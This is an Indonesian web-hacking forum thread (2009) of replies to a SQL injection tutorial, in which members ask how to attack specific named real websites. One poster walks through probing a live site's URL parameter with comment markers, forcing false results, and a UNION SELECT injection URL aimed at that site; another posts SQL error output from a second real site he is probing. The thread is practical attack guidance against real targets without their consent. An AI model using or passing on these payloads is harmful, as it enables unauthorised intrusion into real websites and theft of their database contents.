[TUTORIAL] SQL Injection Pada PHP

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
apriliana
Posts: 38
Joined: Mon Mar 26, 2007 2:02 am
Location: jogja
Contact:

Re: [TUTORIAL]SQL Injection Pada PHP

Post by apriliana » Thu Oct 15, 2009 3:56 pm

bhynte wrote:gimana caranya ngerubah tabel admin = 0x41444d494e
dan colum NAME menjadi = 0x2b
soalnya bingung nih :?:
maaf klw pertanyaannya terlalu mendeteil maklum newbie..
hehehehe... :D
maksudnya bagaimana ya?
klo untuk merubah nama tabel di database dengan perintah alter table klo ga salah
CMIIW

User avatar
ji_bog
Posts: 19
Joined: Sat May 27, 2006 12:22 am
Location: lagi pengen sendiri..
Contact:

Re: [TUTORIAL]SQL Injection Pada PHP

Post by ji_bog » Mon Oct 19, 2009 12:07 pm

bhynte wrote:gimana caranya ngerubah tabel admin = 0x41444d494e
dan colum NAME menjadi = 0x2b
soalnya bingung nih :?:
maaf klw pertanyaannya terlalu mendeteil maklum newbie..
hehehehe... :D
untuk merubahnya menggunakan tool nah toolnya bisa di cari di google ;)
keyword : hex converter ;)
signatur saya begini aja deh :D

Broo
Posts: 3
Joined: Tue Oct 20, 2009 8:05 pm

Re: [TUTORIAL]SQL Injection Pada PHP

Post by Broo » Thu Oct 29, 2009 8:35 pm

butuh pencerahan donk bwt para master...

klo yg ini kira2 bs gk pke SqLi http://zonetz.com/?q=dn&ref=&nwsid=67'

msi kebingungan nehh....

apriliana
Posts: 38
Joined: Mon Mar 26, 2007 2:02 am
Location: jogja
Contact:

Re: [TUTORIAL]SQL Injection Pada PHP

Post by apriliana » Wed Nov 04, 2009 5:42 pm

Broo wrote:butuh pencerahan donk bwt para master...

klo yg ini kira2 bs gk pke SqLi http://zonetz.com/?q=dn&ref=&nwsid=67'

msi kebingungan nehh....
mau jawban lgsg ato model hint neh?

hint nya:
1. cari tanda untuk ngasih komentar
2.cari agar hasil dr scripntny bernilai false..
3.baru cari magic numbernya...
mgkn kata2ku susah dipahami..

nih deh hasilnya silakan dipelajari perintah berikut

Code: Select all

http://zonetz.com/?q=dn&ref=&nwsid=67+and+1=2+union+all+select+1,2,3,4,5,6--

_angga punya_
Posts: 5
Joined: Fri Aug 03, 2007 4:22 am
Location: di atas bumi ini aku berpijak

Re: [TUTORIAL]SQL Injection Pada PHP

Post by _angga punya_ » Thu Nov 05, 2009 3:55 am

om april jelasin donk arti yg ini
1.cari tanda untuk ngasih komentar
2.cari agar hasil dr scripntny bernilai false..
3.baru cari magic numbernya.
kan biar lbh paham :!:
yah klo g keberatan :D :D

apriliana
Posts: 38
Joined: Mon Mar 26, 2007 2:02 am
Location: jogja
Contact:

Re: [TUTORIAL]SQL Injection Pada PHP

Post by apriliana » Thu Nov 05, 2009 2:34 pm

_angga punya_ wrote:om april jelasin donk arti yg ini
1.cari tanda untuk ngasih komentar
2.cari agar hasil dr scripntny bernilai false..
3.baru cari magic numbernya.
kan biar lbh paham :!:
yah klo g keberatan :D :D

>>>>untuk tanda komentar
dalam php ada 2 tanda komentar yaitu -- dan /*
dalam contoh di atas

Code: Select all

http://zonetz.com/?q=dn&ref=&nwsid=67
diganti menjadi

Code: Select all

http://zonetz.com/?q=dn&ref=&nwsid=67/*
maka script web akan eror,tapi kalau diganti menjadi

Code: Select all

http://zonetz.com/?q=dn&ref=&nwsid=67--
maka script akan berjalan normal,apa artinya?itu berarti tanda komentar yg dipake di web itu adalah --

>>>>>cara agar nilai script web bernilai false adalah
kalu kita jalankan perintah

Code: Select all

http://zonetz.com/?q=dn&ref=&nwsid=67--
maka akan tetap menghasilkan nilai true.untuk melihat magic numbernya maka kita harus membuat agar perintah tersebut bernilai false.karena dgn bernilai false maka perintah tersebut tidak akan menampilkan data2 nya.bahasa gampangnya tampilan di web menjadi blank.
ada bnyk cara agar perintah tersebut menjadi bernilai false misal dgn

Code: Select all

http://zonetz.com/?q=dn&ref=&nwsid=-67--
atau bisa jg dengan
http://zonetz.com/?q=dn&ref=&nwsid=67+and+1=2--
caranya tidak semua sama,tapi tergantung kreatifitas untuk mencarinya

>>>mencari magic number
sudah bnyk tutor mencari magic number di forum ini..dicari sendiri dolo yeee

tambah bingung kan akui ngomong apa ehhehe

_angga punya_
Posts: 5
Joined: Fri Aug 03, 2007 4:22 am
Location: di atas bumi ini aku berpijak

Re: [TUTORIAL]SQL Injection Pada PHP

Post by _angga punya_ » Fri Nov 06, 2009 2:22 am

seep dah om mantab bnr pnjelasannya :!:
alhamdulillah ngerti dri beberapa tutornya
tks ya om

apriliana
Posts: 38
Joined: Mon Mar 26, 2007 2:02 am
Location: jogja
Contact:

Re: [TUTORIAL]SQL Injection Pada PHP

Post by apriliana » Sun Nov 08, 2009 2:45 pm

buset dah dipanggil om..........

akika cucok begindang dipanggil om..... :mrgreen: :mrgreen:

User avatar
ninewhite
Posts: 12
Joined: Fri Dec 18, 2009 1:04 pm
Location: Indonesia
Contact:

Re: [TUTORIAL] SQL Injection Pada PHP

Post by ninewhite » Fri Dec 25, 2009 3:57 pm

kak, cara konversi ke hexadecimal_sqlgimana ya?

User avatar
komporgas
Posts: 24
Joined: Sat Jan 05, 2008 4:09 pm
Location: PADANG
Contact:

Re: [TUTORIAL] SQL Injection Pada PHP

Post by komporgas » Sat Dec 26, 2009 11:59 am

dear bang ji_bong
ane mau nanya, setelah langkah ke 2, hasilnya harus seperti ini ya...
ji_bog wrote:

Code: Select all

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
... :circle: :circle: :circle:

karna saya nemunya kayak gni

Code: Select all

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 4
di situs ini : http://www.iau.org.tw/news_detail.php?Id=526%27

:pusing: :pusing: :pusing:

mohon pencerahannya ya bang... :love: :love:
Kembangkan minat mu dan buktikan kemampuan mu
Jangan Sesekali Mampir di http://elco.teknikelektronika.net dan http://replayfrom.wordpress.com
Trimakasih ya :)

Post Reply

Return to “Web Hacking”